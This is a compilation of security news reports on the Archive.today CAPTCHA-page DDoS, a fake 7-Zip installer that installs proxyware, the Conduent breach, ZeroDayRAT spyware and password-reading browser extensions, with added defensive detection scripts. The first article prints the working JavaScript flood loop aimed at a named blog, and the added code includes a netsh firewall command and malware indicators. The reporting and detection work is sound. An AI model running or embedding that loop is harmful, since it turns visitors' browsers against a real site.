security meets culture
Archive.today CAPTCHA page executes DDoS; Wikipedia considers banning site
By Jon Brodkin for Ars Technica
DDoS hit blog that tried to uncover Archive.today founder's identity in 2023.
Credit: Getty Images | Riccardo Milani
Wikipedia editors are discussing whether to blacklist Archive.today because the archive site was used to direct a Distributed Denial of Service (DDoS) attack against a blogger who wrote a post in 2023 about the mysterious website's anonymous maintainer.
In a request for comment page, Wikipedia's volunteer editors were presented with 3 options. Option A is to remove or hide all Archive.today links and add the site to the spam blacklist. Option B is to deprecate Archive.today, discouraging future link additions while keeping the existing archived links. Option C is to do nothing and maintain the status quo.
Option A in particular would be a huge change, as more than 695,000 links to Archive.today are used across 400,000 or so Wikipedia pages. Archive.today, also known as Archive.is, is a website that saves snapshots of webpages and is commonly used to bypass news paywalls.
"Archive.today uses advanced scraping methods, and is generally considered more reliable than the Internet Archive," the Wikipedia request for comment said. "Due to concerns about botnets, linkspamming, and how the site is run, the community decided to blacklist it in 2013. In 2016, the decision was overturned, and archive.today was removed from the spam blacklist."
Discussion among editors has been ongoing since February 7. "Wikipedia's need for verifiable citations is absolutely not more important than the security of users," one editor in favor of blacklisting wrote. "We need verifiable citations so that we can maintain readers' trust, however, in order to be trustworthy our references also have to be safe to access."
Archive would be hard to replace
On the other side, an editor who supported Option C wrote that "Archive.today contains a vast amount of archives available nowhere else. Not on Wayback Machine, nowhere. It is the second largest archive provider across all Wikimedia sites. Removal/blockage of this site will be disruptive daily for thousands of editors and readers. It will result in a huge proliferation of {{dead link}} tags that will never be resolved."
Several posts mentioned an ongoing FBI case that could eventually make the Archive.today links useless anyway. Some said it would be better to act now than to have Option A forced on them later without a backup plan.
One editor supported starting with Option B and eventually shifting to Option A with "the proper end goal being the WMF (Wikimedia Foundation) supporting some sort of archive system, whether their own original or directly supporting the Internet Archive's work so it can be done more systematically."
Some discussion centered on copyright infringement, given that Archive.today publishes copies of many copyrighted articles. "On the general problem of linking to copyright infringement: perhaps the Wikimedia Foundation can work on ways to establish legally licensed archives of major paywalled sites, in partnership with archives such as the Internet Archive," one editor wrote. "It would be challenging given the business model of those sites, but maybe a workable compromise can be established that manages how many Wikipedia editors [have] access at a given time."
Malicious code in CAPTCHA page
The DDoS attack being discussed by Wikipedia editors was targeted at the Gyrovague blog written by Jani Patokallio. Last month, "the maintainers of Archive.today injected malicious code in order to perform a distributed denial of service attack against a person they were in dispute with," the Wikipedia request for comment says. "Every time a user encounters the CAPTCHA page, their Internet connection is used to attack a certain individual's blog."
The trustworthiness of Archive.today was discussed in light of evidence that the site's founder threatened to create "a new category of AI porn" in retaliation against the blogger. The AI porn threat was mentioned by several editors.
"I echo others [that Option] A is looking like something we'll have to do eventually, anyways, and at least this way we have a chance to do it on our terms," one editor wrote. "I hate to break it to you, but even if the FBI thing goes nowhere, a website whose operator apparently threatens to create AI porn in retaliation against enemies, using their names, isn't a trustworthy mirror, and isn't going to remain one."
One editor reported being "miserable" about supporting Option A, "but we cannot permit websites to rope our readers into being part of DDoS attacks." Moreover, "The fact is that most of the archive.today links on Wikipedia are not an attempt to save URLs that have now gone dead that the Internet Archive cannot handle, but efforts to bypass paywalls, which is convenient, but illegal. It's strange that we accept links to archive.today for this purpose but don't accept the same for Anna's Archive or Sci-Hub," the editor wrote.
We emailed Archive.today's webmaster address today about the Wikipedia discussion and will update this article if we get a response.
Blogger tried to uncover founder's identity
The Wikipedia request for comments acknowledged that whether to blacklist would be a difficult decision. There are "significant concerns for readers' safety, as well as the long-term stability and integrity of the service," but "a significant amount of people also think that mass-removing links to Archive.today may harm verifiability, and that the service is harder to censor than certain other archiving sites," it said.
An update to the request for comments yesterday indicated that the attack temporarily stopped, but the malicious code had been reactivated. "Please do not visit the archive without blocking network requests to gyrovague.com to avoid being part of the attack!" it said.
The code's first public mention was apparently in a Hacker News thread on January 14, and Patokallio wrote about the DDoS in a February 1 blog post. "Every 300 milliseconds, as long as the CAPTCHA page is open, this makes a request to the search function of my blog using a random string, ensuring the response cannot be cached and thus consumes resources," he wrote. The JavaScript code in the Archive.today CAPTCHA page is as follows:
setInterval(function() {
  // Random base-36 string as the search term, so every response misses the cache.
  fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
    referrerPolicy: "no-referrer",
    mode: "no-cors"
  });
}, 300);
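The request pattern that snippet produces is what the targeted site's operator sees in the web server's access log. The following Python is an added example, not code from the article or from either party in the dispute: it analyses constructed access-log lines (not real Gyrovague traffic) for that pattern, many distinct client addresses hitting the search endpoint with query strings that are almost never repeated, so every response is uncacheable. The log format, the thresholds and the sample IP addresses are assumptions. One point the snippet makes unavoidable: because it sets referrerPolicy: "no-referrer", the victim never sees a Referer header naming the page that originated the requests, so detection has to rest on the shape of the requests themselves, not their origin.

```python
"""Spot a distributed cache-busting flood against a blog's search endpoint.

Added example, not code from the article.  The quoted CAPTCHA snippet requests
``/?s=<random>`` every 300 ms from each visitor's browser and, because of
``referrerPolicy: "no-referrer"``, the victim never learns which page started
the requests.  What the victim can see in its access log is the traffic shape:
many distinct client IPs, one path family, and query strings that are almost
never repeated (a human repeating a search reuses the same term).
"""
import random
import re
from datetime import datetime, timedelta, timezone

# Common Log Format line; assumption: the blog logs in this format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+$'
)
# WordPress-style search: "/?s=<term>" with no other parameters.
SEARCH_RE = re.compile(r"^/\?s=(?P<q>[^&]*)$")


def parse_line(line):
    """Parse one access-log line into a dict; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "target": m["target"],
        "status": int(m["status"]),
    }


def analyze_search_traffic(lines, min_requests=20, min_ips=5, min_unique_ratio=0.9):
    """Summarise search requests and flag a cache-busting flood.

    Thresholds are assumptions to tune per site: flag when at least
    `min_requests` searches came from at least `min_ips` distinct addresses and
    at least `min_unique_ratio` of the query strings were never repeated.
    """
    queries, ips = [], set()
    for ev in filter(None, map(parse_line, lines)):
        m = SEARCH_RE.match(ev["target"])
        if m:
            queries.append(m["q"])
            ips.add(ev["ip"])
    total = len(queries)
    unique_ratio = len(set(queries)) / total if total else 0.0
    flagged = (total >= min_requests and len(ips) >= min_ips
               and unique_ratio >= min_unique_ratio)
    return {
        "requests": total,
        "distinct_ips": len(ips),
        "unique_ratio": round(unique_ratio, 3),
        "flagged": flagged,
        "sources": sorted(ips),  # candidates for rate limiting at the edge
    }


def build_sample_log(flood_requests=40, flood_ips=8, seed=7):
    """Constructed log lines (not real traffic): a few ordinary page views and
    searches, plus `flood_requests` searches spread across `flood_ips` visitor
    addresses at 300 ms intervals with short random base-36 terms, mimicking
    what the quoted snippet generates.  Returns (benign_lines, flood_lines)."""
    rng = random.Random(seed)
    t0 = datetime(2026, 2, 1, 12, 0, 0, tzinfo=timezone.utc)
    alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"

    def line(ip, t, target, status=200):
        stamp = t.strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{stamp}] "GET {target} HTTP/1.1" {status} 1234'

    benign = [
        line("203.0.113.5", t0, "/"),
        line("203.0.113.5", t0 + timedelta(seconds=4), "/?s=archive"),
        line("203.0.113.9", t0 + timedelta(seconds=6), "/?s=archive"),
        line("198.51.100.2", t0 + timedelta(seconds=9), "/2023/08/some-post/"),
    ]
    flood = []
    for i in range(flood_requests):
        ip = f"192.0.2.{10 + i % flood_ips}"
        term = "".join(rng.choice(alphabet) for _ in range(rng.randint(3, 9)))
        flood.append(line(ip, t0 + timedelta(milliseconds=300 * i), f"/?s={term}"))
    return benign, flood


if __name__ == "__main__":
    benign, flood = build_sample_log()
    print(analyze_search_traffic(benign + flood))
```

The uniqueness ratio is the discriminating signal here: genuine visitors repeat search terms, whereas a cache-busting loop never does. A flat-fee host, as Patokallio notes, absorbs the cost, but an operator who is billed per request would want to feed the returned source list into a rate limit on the search path at the CDN or web server.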
In August 2023, Patokallio wrote a post attempting to uncover the identity of Archive.today founder "Denis Petrov," which seems to be an alias. Patokallio wasn't able to figure out who the founder is but cobbled together various tidbits from Internet searches, including a Stack Exchange post that mentioned another potential alias, "Masha Rabinovich."
Patokallio seemed to be driven by curiosity and was impressed by Archive.today's work. "It's a testament to their persistence that they're managed to keep this up for over 10 years, and I for one will be buying Denis/Masha/whoever a well deserved cup of coffee," Patokallio's 2023 post said.
The Gyrovague blog's sidebar states that Patokallio works for Google's Cloud team in Sydney, Australia. In his post this month, Patokallio said his 2023 blog post "gathered some 10,000 views and a bit [of] discussion on Hacker News, but didn't exactly set the blogosphere on fire. And indeed, absolutely nothing happened for the next 2 years and a bit."
FBI case revives interest in 2023 blog
But in October 2025, the FBI sent a subpoena to domain registrar Tucows seeking "subscriber information on [the] customer behind archive.today" in connection with "a federal criminal investigation being conducted by the FBI." We wrote about the subpoena, and our story included a link to Patokallio's 2023 blog post in a sentence that said, "There are several indications that the [Archive.today] founder is from Russia."
In an email to Ars, Patokallio told us that the DDoS attack "appears to be because you kindly mentioned my blog in your Nov 8, 2025 story." Patokallio added that he is "as mystified by this as you probably are." Articles about the subpoena by The Verge and Heise Online also linked to Patokallio's 2023 blog post.
On January 8, 2026, Patokallio's hosting company, Automattic, notified him that it received a GDPR (General Data Protection Regulation) complaint from a "Nora Puchreiner" alleging that the 2023 post "contains extensive personal data… presented in a narrative that is defamatory in tone and context." Patokallio said that after he submitted a rebuttal, "Automattic sided with me and left the post up."
Patokallio said he also "received a politely worded email from archive.today's webmaster asking me to take down the post for a few months" on January 10. The email was classified as spam by Gmail, and he didn't see it until 5 days later, he said. In the meantime, the DDoS started.
Patokallio said he replied to the webmaster's email on January 15 and again on January 20 but didn't hear back. He tried a third time on January 25, saying he would not take down the blog post but offered to "change some wording that you feel is being misrepresented."
Emails threatened AI porn and other scams
Patokallio posted what he called a lightly redacted copy of the resulting email thread. The first email from the Archive.today webmaster said, "I do not mind the post, but the issue is: journos from mainstream media (Heise, Verge, etc.) cherry-pick just a couple of words from your blog, and then construct very different narratives having your post the only citable source; then they cite each other and produce a shitty result to present for a wide audience."
In a later email, "Nora Puchreiner" wrote, "I do not care on your blog and its content. I just need the links from Heise and other media to be 404." One message threatened to investigate "your Nazi grandfather" and "vibecode a gyrovague.gay dating app." Another threatened to create a public association between Patokallio's name and AI porn.
A Tumblr blog post apparently written by the Archive.today founder seems to generally confirm the emails' veracity, but says the original version threatened to create "a patokallio.gay dating app," not "a gyrovague.gay dating app." The Tumblr blog has several other recent posts criticizing Patokallio and accusing him of hiding his real name. However, the Gyrovague blog shows Patokallio's name in a sidebar and discloses that he works for Google, while stating that the blog posts contain only his personal views.
In one email, Patokallio included a link to Wikipedia's page on the Streisand effect, a name for situations in which people seeking to suppress access to information instead draw more public attention to the information they want hidden. The Archive.today site maintainer apparently viewed this as a threat.
"And threatening me with Streisand… having such a noble and rare name, which in retaliation could be used for the name of a scam project or become a byword for a new category of AI porn… are you serious?" the email said. Patokallio responded, "No, you're Streisanding yourself: the DDOS has already drawn more attention to my blog post than it had gotten in the last 2 years, with zero action on my side."
A subsequent reply in the email thread contained the "Nazi grandfather" and "gay dating app" threats. Patokallio wrote that after these emails, it didn't seem worthwhile to continue the discussion. "At this point it was pretty clear the conversation had run its course, so here we are," Patokallio wrote in his February 1 blog post. "And for the record, my long-dead grandfather served in an anti-aircraft unit of the Finnish Army during WW2, defending against the attacks of the Soviet Union. Perhaps this is enough to qualify as a 'Nazi' in Russia these days."
While the outcome at Wikipedia is not yet settled, Patokallio wrote that the DDoS attack didn't cause him any real harm. The Archive.today maintainer apparently intended to make Patokallio's hosting costs more expensive, but "I have a flat fee plan, meaning this has cost me exactly zero dollars," he wrote.
Malicious 7-Zip site distributes installer laced with proxy tool
By Bill Toulas for bleepingcomputer
A fake 7-Zip website is distributing a trojanized installer of the popular archiving tool that turns the user's computer into a residential proxy node.
Residential proxy networks use home user devices to route traffic with the goal of evading blocks and performing various malicious activities such as credential stuffing, phishing, and malware distribution.
The new campaign became better known after a user reported that they downloaded a malicious installer from a website impersonating the 7-Zip project while following instructions in a YouTube tutorial on building a PC system. BleepingComputer can confirm that the malicious website, 7zip[.]com, is still live.
The threat actor registered the domain 7zip[.]com (still live at the time of writing), which can easily trick users into thinking they have landed on the site of the legitimate tool.
Furthermore, the attacker copied the text and mimicked the structure of the original 7-Zip website located at 7-zip.org.
The installer file was analyzed by researchers at cybersecurity company Malwarebytes, who found that it is digitally signed with a now-revoked certificate originally issued to Jozeal Network Technology Co., Limited.
The malicious copy also contains the 7-Zip program, thus providing the regular functions of the tool. However, the installer drops 3 malicious files:
- Uphero.exe – service manager and update loader
- hero.exe – main proxy payload
- hero.dll – support library
These files are placed in the 'C:\Windows\SysWOW64\hero\' directory, and an auto-start Windows service running as SYSTEM is created for the 2 malicious executables.
Additionally, firewall rules are modified using 'netsh' to allow the binaries to establish inbound and outbound connections.
The host system is then profiled with Microsoft's Windows Management Instrumentation (WMI) and Windows APIs to determine its hardware, memory, CPU, disk, and network characteristics. The collected data is sent to 'iplogger[.]org.'
"While initial indicators suggested backdoor‑style capabilities, further analysis revealed that the malware's primary function is proxyware," Malwarebytes explains about the malware's operational goal.
"The infected host is enrolled as a residential proxy node, allowing third parties to route traffic through the victim's IP address."
According to the analysis, hero.exe pulls its configuration from rotating "smshero"-themed C2 domains, then opens outbound proxy connections on non-standard ports such as 1000 and 1002. Control messages are obfuscated using a lightweight XOR key.
Malwarebytes found that the campaign is larger than the 7-Zip lure and also uses trojanized installers for HolaVPN, TikTok, WhatsApp, and Wire VPN.
The malware uses a rotating C2 infrastructure built around hero/smshero domains, with traffic routed through Cloudflare's infrastructure and carried over TLS-encrypted HTTPS.
It also relies on DNS-over-HTTPS via Google's resolver, which reduces visibility for defenders monitoring standard DNS traffic.
The malware also checks for virtualization platforms such as VMware, VirtualBox, QEMU, Parallels, as well as for debuggers, to identify when it's being analyzed.
Malwarebytes' investigation started after noticing research from independent security researchers who analyzed the malware and uncovered its true purpose. Researcher Luke Acha discovered the purpose of the Uphero/hero malware.
The XOR-based communication protocol was reverse-engineered and decoded by s1dhy, who confirmed the proxy behavior. Digital forensics and incident response (DFIR) engineer Andrew Danis connected the fake 7-Zip installer to the larger campaign impersonating multiple software brands.
Malwarebytes lists indicators of compromise-- domains, file paths, IP addresses-- and host-related data observed during their analysis.
Users are recommended to avoid following URLs from YouTube videos or promoted search results, and instead bookmark the download portal domains for the software they use often.
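The host-side behaviours the article lists (three files dropped into the hero directory under SysWOW64, an auto-start service running as SYSTEM, netsh firewall changes for the binaries, profiling data sent to iplogger[.]org, outbound proxy connections on ports 1000 and 1002, and DNS-over-HTTPS to Google's resolver) are each individually huntable. The Python below is an added example, not code from BleepingComputer or Malwarebytes: it runs a small rule set over constructed endpoint telemetry records loosely modelled on Sysmon and Windows System-log fields. The event layout, rule names, scoring and sample records are mine, and the assumption that "Google's resolver" means the dns.google DoH endpoint is labelled in the code; only the paths, file names, ports and destinations named in the article are taken from it.

```python
"""Hunt for the trojanized-7-Zip behaviours described in the article.

Added example, not code from the article or from Malwarebytes.  Events are flat
dicts loosely modelled on Sysmon / System-log fields; events, rule names and
scoring are constructed.  The hero directory, the three dropped file names, the
netsh firewall change, the SYSTEM auto-start service, ports 1000/1002 and the
iplogger.org destination come from the article.
"""
import re

HERO_DIR = "c:\\windows\\syswow64\\hero\\"
DROPPED_FILES = {"uphero.exe", "hero.exe", "hero.dll"}
PROXY_PORTS = {1000, 1002}
DOH_HOST = "dns.google"  # assumption: "Google's resolver" means its public DoH endpoint
EXFIL_HOST = "iplogger.org"
NETSH_ADD_RULE = re.compile(r"advfirewall\s+firewall\s+add\s+rule", re.IGNORECASE)


def _norm(path):
    """Lower-case a Windows path and unify separators so comparisons are stable."""
    return (path or "").lower().replace("/", "\\")


def in_hero_dir(path):
    return _norm(path).startswith(HERO_DIR)


def basename(path):
    return _norm(path).rsplit("\\", 1)[-1]


# Each rule inspects one event and answers yes/no.
def rule_dropped_files(ev):
    p = ev.get("path")
    return ev.get("type") == "file_create" and in_hero_dir(p) and basename(p) in DROPPED_FILES


def rule_firewall_tamper(ev):
    cmd = ev.get("cmdline", "")
    return (ev.get("type") == "process_create" and basename(ev.get("image")) == "netsh.exe"
            and NETSH_ADD_RULE.search(cmd) is not None and "syswow64\\hero\\" in _norm(cmd))


def rule_system_service(ev):
    return (ev.get("type") == "service_install" and in_hero_dir(ev.get("image"))
            and ev.get("account", "").lower() == "localsystem"
            and ev.get("start", "").lower() == "auto")


def rule_proxy_port(ev):
    return (ev.get("type") == "network_connect" and in_hero_dir(ev.get("image"))
            and ev.get("dst_port") in PROXY_PORTS)


def rule_doh_from_hero(ev):
    # Scoped to the hero directory: browsers also talk to dns.google, and that alone is no finding.
    return (ev.get("type") == "network_connect" and in_hero_dir(ev.get("image"))
            and ev.get("dst_host", "").lower() == DOH_HOST)


def rule_profiling_exfil(ev):
    host = ev.get("dst_host", "").lower()
    return ev.get("type") == "network_connect" and (host == EXFIL_HOST or host.endswith("." + EXFIL_HOST))


RULES = {
    "dropped_files": rule_dropped_files, "firewall_tamper": rule_firewall_tamper,
    "system_service": rule_system_service, "proxy_port": rule_proxy_port,
    "doh_from_hero": rule_doh_from_hero, "profiling_exfil": rule_profiling_exfil,
}


def hunt(events):
    """Return {rule_name: [event ids]} for every rule that matched at least once."""
    hits = {name: [ev["id"] for ev in events if rule(ev)] for name, rule in RULES.items()}
    return {name: ids for name, ids in hits.items() if ids}


def verdict(hits):
    """Constructed scoring: several behaviours together is the strong signal; any one
    deserves a look, since a genuine 7-Zip install exhibits none of them."""
    return "high" if len(hits) >= 3 else ("medium" if hits else "none")


# Constructed telemetry for one infected host (not real data; C2 host is a placeholder).
INFECTED_EVENTS = [
    {"id": 1, "type": "file_create", "path": r"C:\Windows\SysWOW64\hero\Uphero.exe"},
    {"id": 2, "type": "file_create", "path": r"C:\Windows\SysWOW64\hero\hero.exe"},
    {"id": 3, "type": "file_create", "path": r"C:\Windows\SysWOW64\hero\hero.dll"},
    {"id": 4, "type": "process_create", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": r'netsh advfirewall firewall add rule name="hero" dir=in action=allow program="C:\Windows\SysWOW64\hero\hero.exe"'},
    {"id": 5, "type": "service_install", "image": r"C:\Windows\SysWOW64\hero\Uphero.exe",
     "account": "LocalSystem", "start": "auto"},
    {"id": 6, "type": "network_connect", "image": r"C:\Windows\SysWOW64\hero\hero.exe", "dst_host": "dns.google", "dst_port": 443},
    {"id": 7, "type": "network_connect", "image": r"C:\Windows\SysWOW64\hero\hero.exe", "dst_host": "iplogger.org", "dst_port": 443},
    {"id": 8, "type": "network_connect", "image": r"C:\Windows\SysWOW64\hero\hero.exe", "dst_host": "c2-placeholder.invalid", "dst_port": 1002},
]

# Constructed telemetry for a clean host: a genuine 7-Zip install, a vendor service, a browser using DoH.
CLEAN_EVENTS = [
    {"id": 11, "type": "file_create", "path": r"C:\Program Files\7-Zip\7z.exe"},
    {"id": 12, "type": "service_install", "image": r"C:\Program Files\Vendor\svc.exe", "account": "LocalSystem", "start": "auto"},
    {"id": 13, "type": "network_connect", "image": r"C:\Program Files\Browser\browser.exe", "dst_host": "dns.google", "dst_port": 443},
]
```

Two design points matter for false positives: the DoH rule is deliberately scoped to processes running from the hero directory, because browsers and the OS legitimately use dns.google, and the service rule requires both the SYSTEM account and the hero path, since many legitimate services run as LocalSystem. The article's own IoC list (domains, paths, IPs) would extend the constants at the top of the file.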
Volvo Group North America Customer Data Exposed in Conduent Hack
By Bill Toulas for bleepingcomputer
Volvo Group North America disclosed that it suffered an indirect data breach stemming from the compromise of IT systems at American business services giant Conduent, of which Volvo is a customer.
Volvo Group North America is the Swedish multinational's operating arm in the United States, Canada, and Mexico. It focuses on manufacturing commercial vehicles and heavy equipment, including trucks, buses, construction equipment, engines, and industrial power systems.
Mack Trucks, a very popular brand in the US, is one of its subsidiaries. Volvo Group is not the same as Volvo Cars, and does not manufacture passenger cars.
Nearly 17,000 customers and/or staff of Volvo Group North America had their personal details exposed in the massive data breach that Conduent disclosed in late 2025.
Conduent is an American business process outsourcing (BPO) company that provides digital platforms and services for governments and enterprises.
The company suffered a security breach between October 21, 2024, and January 13, 2025, where threat actors stole full names, Social Security Numbers (SSNs), dates of birth, health insurance policy details, ID numbers, and medical information.
Conduent has not yet determined the exact number of impacted individuals, but has previously disclosed that it affects 10.5 million people in Oregon and another 15.5 million in Texas.
The company is now sending notifications on behalf of its customers to impacted parties, offering Volvo Group North America clients and staff free membership to identity monitoring services for at least a year, along with credit and dark web monitoring, and identity restoration.
Additionally, notification recipients are advised to consider placing fraud alerts or a security freeze on their credit reports.
Volvo Group North America has recently suffered a new data breach, also caused by a third-party supplier, exposing staff data such as full names and Social Security Numbers.
That breach was caused by a compromise at IT services supplier Miljödata in August 2025, which exposed the information of 1.5 million people, including Volvo Group employees in Sweden and in the US.
In 2021, Volvo Cars suffered a security breach where hackers stole research and development (R&D) data from its servers. That attack was claimed by the 'Snatch' data extortion group, which leaked the stolen files on their extortion portal.
ZeroDayRAT Malware grants Full Access to Android, iOS Devices
By Bill Toulas for bleepingcomputer
A new commercial mobile spyware platform dubbed ZeroDayRAT is being advertised to cybercriminals on Telegram as a tool that provides full remote control over compromised Android and iOS devices.
The malware provides buyers with a full-featured panel for managing infected devices, reportedly supporting Android 5 through 16 and iOS up to the latest version, 26.
Researchers at mobile threat hunting company iVerify say that ZeroDayRAT not only steals data but also enables real-time surveillance and financial theft.
The dashboard shows compromised devices and information about the model, operating system version, battery status, SIM details, country, and lock state.
The malware can log app usage, activity timelines, SMS message exchanges, and provides an overview to the operator.
Other tracking tabs on the dashboard display all received notifications, and also registered accounts on the infected device, showing email/user ID, potentially enabling brute-forcing and credential stuffing.
If the malware obtains GPS access, it can also track the victim in real time and draw their current position on a Google Maps view, with full location history.
Apart from passive data logging, ZeroDayRAT also supports active hands-on operations, such as activating the device's cameras-- front and rear-- and microphone to gain access to a live media feed, or recording the victim's screen to expose other secrets.
Moreover, if the malware obtains the SMS access permission, it can capture incoming one-time passwords (OTPs), enabling 2FA bypass, and can also send SMS from the victim's device.
The malware developer also included a keylogging module that can capture user input, like passwords, gestures, or screen unlock patterns.
Further financial theft is enabled through a cryptocurrency stealer module. The researchers found that the component activates a wallet app scanner looking for MetaMask, Trust Wallet, Binance, and Coinbase, logs wallet IDs and balances, and attempts clipboard address injection, replacing copied wallet addresses with attacker-controlled ones.
The bank stealer targets online banking apps, UPI platforms like Google Pay and PhonePe, and payment services such as Apple Pay and PayPal. Credential theft occurs by overlaying fake screens.
iVerify does not detail how the malware is delivered but say that ZeroDayRAT "is a complete mobile compromise toolkit." The researchers warn that a compromised employee device could lead to enterprise breaches.
For an individual, a ZeroDayRAT compromise could expose their privacy and lead to financial losses.
Users are recommended to only trust the official app stores, Google Play on Android and the App Store on iOS, and to install apps from reputable publishers. High-risk users should consider enabling Lockdown Mode on iOS and Advanced Protection on Android.
Your Browser Extensions can See Every Password You Type
By Tashreef Shareef for Make Use Of
Credit: Tashreef Shareef / MakeUseOf
Browser extensions enhance the functionality of the browser, and most of us have at least one 3rd-party add-on installed. I always keep a handful of Chrome extensions installed for productivity, and some of them are ones I genuinely can't browse without. Ad blockers, full-page screenshot tools, price comparison trackers: they all seem harmless enough.
However, some of these extensions, including ones with thousands of 5-star reviews, can see your passwords as you type them into websites. A vulnerability in how browsers share page data with extensions gives them unrestricted access to everything on a web page, and some have been caught leaking sensitive user information because of it.
A DOM vulnerability that exposes your password - How extensions read what you type in plain text
Researchers at the University of Wisconsin-Madison found that browser extensions can access passwords typed into websites, even when they comply with Chrome's latest Manifest V3 security standards. The team analyzed over 7,000 websites and discovered that about 15% of them stored sensitive information like passwords, credit card numbers, and Social Security numbers directly in the page's HTML code as plain text.
This happens because of how browsers handle the DOM-- Document Object Model-- which is the structure that represents everything on a web page. When you type a password, your browser stores that value in a DOM element that any extension with the right permissions can read. Extensions can exploit this in three main ways: keylogging to capture each keystroke as it happens, accessing the HTML source code directly to grab stored values, and abusing DOM APIs to extract values from input fields as you type. It's the last method that is especially concerning because it bypasses any visual obfuscation like dots or asterisks that only hide the password from your screen, not from the code running behind it.
The irony is that browsers are configured this way on purpose. Legitimate password managers need to read and fill in these fields to work properly. But that same access creates an opening for malicious extensions. Even Chrome's latest Manifest V3 standard, which was designed to improve extension security, doesn't create a security boundary between extensions and web page content. The researchers built a proof-of-concept extension disguised as an AI assistant, submitted it to the Chrome Web Store, and got it approved, proving how easily a harmful extension can slip through.
The permission trap - Trusted extensions that turned malicious overnight
Most of us install extensions that have been vetted by official browser stores, which makes them easy to trust. We click through permission prompts without a second thought, including the one that says Read and change all your data on websites you visit. That single permission is all an extension needs to access everything you type, including passwords.
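The "all your data on websites you visit" permission described above is visible in an extension's manifest before you install it. As an added example (not from the article, and not any real extension's code), this Python script audits an unpacked extension's Manifest V3 manifest.json for all-sites host access and all-sites content-script matches, which is the access level that lets a content script read password fields in the DOM; the sample manifests and the list of "sensitive" API permissions are constructed assumptions for the demo.

```python
"""Added example (not from the article): audit a Chrome Manifest V3
manifest.json for the "read and change all your data on all websites" level
of host access that lets an extension observe every page's DOM, password
fields included.  The sample manifests below are constructed for the demo."""
import json
import re

# Patterns Chrome treats as "all sites".  <all_urls> and *://*/* are the
# canonical forms; the regexp also catches scheme-specific wildcard hosts
# such as https://*/* .
ALL_SITES = {"<all_urls>", "*://*/*"}
WILDCARD_HOST = re.compile(r"^(\*|https?|ftp|file)://\*/")

# API permissions worth a second look when paired with all-sites host access
# (an assumed review list for this example, not Chrome's own classification).
SENSITIVE_APIS = {"scripting", "webRequest", "cookies", "tabs",
                  "clipboardRead", "debugger", "nativeMessaging"}


def is_all_sites(pattern: str) -> bool:
    """True when a match pattern grants access to every site."""
    return pattern in ALL_SITES or bool(WILDCARD_HOST.match(pattern))


def looks_like_host_pattern(p: str) -> bool:
    # MV2 manifests put host patterns in "permissions"; MV3 moved them to
    # "host_permissions".  Accept both so older manifests are audited too.
    return p == "<all_urls>" or "://" in p


def audit_manifest(manifest: dict) -> list:
    """Return one finding per place the manifest asks for all-sites access."""
    findings = []

    def add(severity, where, detail):
        findings.append({"severity": severity, "where": where, "detail": detail})

    hosts = list(manifest.get("host_permissions", []))
    hosts += [p for p in manifest.get("permissions", []) if looks_like_host_pattern(p)]
    for p in hosts:
        if is_all_sites(p):
            add("high", "host_permissions", f"access to every site: {p}")
    for p in manifest.get("optional_host_permissions", []):
        if is_all_sites(p):
            add("medium", "optional_host_permissions",
                f"may request access to every site at runtime: {p}")
    for i, cs in enumerate(manifest.get("content_scripts", [])):
        for m in cs.get("matches", []):
            if is_all_sites(m):
                js = ", ".join(cs.get("js", [])) or "(no js)"
                add("high", f"content_scripts[{i}]",
                    f"injects {js} into every page: {m}")
    for p in manifest.get("permissions", []):
        if p in SENSITIVE_APIS:
            add("info", "permissions", f"sensitive API permission: {p}")
    return findings


def verdict(manifest: dict) -> str:
    high = [f for f in audit_manifest(manifest) if f["severity"] == "high"]
    if high:
        return "all-sites access: can read every page you visit, including password fields"
    return "no all-sites access requested"


# Constructed sample manifests (not real extensions).
BROAD_MANIFEST = json.loads("""{
  "manifest_version": 3, "name": "Handy Assistant", "version": "1.0",
  "permissions": ["storage", "scripting"],
  "host_permissions": ["<all_urls>"],
  "content_scripts": [{"matches": ["*://*/*"], "js": ["content.js"]}]
}""")

NARROW_MANIFEST = json.loads("""{
  "manifest_version": 3, "name": "Site Helper", "version": "2.1",
  "permissions": ["storage"],
  "host_permissions": ["https://example.com/*"],
  "content_scripts": [{"matches": ["https://example.com/*"], "js": ["helper.js"]}]
}""")

if __name__ == "__main__":
    for m in (BROAD_MANIFEST, NARROW_MANIFEST):
        print(f"{m['name']}: {verdict(m)}")
        for f in audit_manifest(m):
            print(f"  [{f['severity']}] {f['where']}: {f['detail']}")
```

To audit a real extension, load its unpacked directory's manifest.json with `json.load` and pass the dict to `verdict`.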
What makes this worse is that some extensions operate with a clean reputation for years before turning hostile. The ShadyPanda campaign, which has been running since 2018, compromised roughly 4.3 million Chrome and Edge users by pushing malicious updates to previously legitimate extensions. Some of these add-ons ran cleanly for seven years before receiving their first malicious payload. WeTab, a new tab extension for Microsoft Edge with over three million installs and thousands of positive reviews, was found to be injecting malicious links and sending browsing data to servers in China while users had no idea anything had changed.
The MEGA.nz Chrome extension was compromised in 2018, leaking usernames, passwords, and cryptocurrency keys from an estimated 1.6 million users over four hours before anyone noticed. In 2024, CyberHaven's browser extension was hijacked through an OAuth phishing attack and used to exfiltrate cookies, session tokens, and Facebook Ads account data from over 400,000 users. The Trust Wallet browser extension suffered a similar breach that led to roughly $7 million in cryptocurrency theft.
As you may have noticed by now, these aren't obscure extensions from unknown developers. They were popular, well-reviewed, and trusted by millions, until they weren't.
What you can do to protect yourself - Reducing your attack surface across every browser
If you think switching from Chrome to Firefox fixes this, it doesn't. The DarkSpectre sleeper extension campaign recently hit Firefox with its GhostPoster operation, where attackers hid malicious JavaScript inside PNG image files using steganography. The affected extensions had over 840,000 downloads across browsers, and some had been active for up to 5 years before researchers exposed them.
Mozilla has since removed the affected add-ons and disabled them in users' browsers, but Chrome and Edge users with the same compromised extensions still need to manually uninstall them. This proves that this isn't a Chrome-only problem, but a browser extension ecosystem problem, so switching to a different browser is not a solution.
